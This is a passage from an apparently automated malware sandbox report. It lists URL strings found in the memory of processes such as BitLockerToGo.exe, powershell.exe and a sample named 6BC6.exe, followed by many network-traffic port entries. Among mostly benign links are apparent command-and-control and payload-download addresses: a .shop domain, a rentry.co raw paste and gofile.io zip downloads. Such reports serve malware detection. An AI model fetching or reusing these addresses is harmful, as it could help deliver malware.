                  Source: BitLockerToGo.exe, 0000000D.00000003.2676850252.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677772639.000000000285A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/hNf
                  Source: BitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/lbf
                  Source: BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://callosallsaospz.shop/pf
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: powershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F358A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: powershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: 6BC6.exe, 0000000A.00000002.4157872615.0000012B44375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
                  Source: 6BC6.exe, 0000000A.00000002.4154800480.0000012B424A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
                  Source: 6BC6.exe, 0000000A.00000002.4157872615.0000012B44375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/microgods/raw
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F3560C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store4.gofile.io
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F3560C000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.10.drString found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
                  Source: powershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.10.drString found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600782433.0000000004B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600782433.0000000004B6C000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: BitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: BitLockerToGo.exe, 0000000D.00000003.2600782433.0000000004B6C000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: BitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                  Source: explorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: BitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                  Source: 6BC6.exe.1.drString found in binary or memory: https://www.ssl.com/repository0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
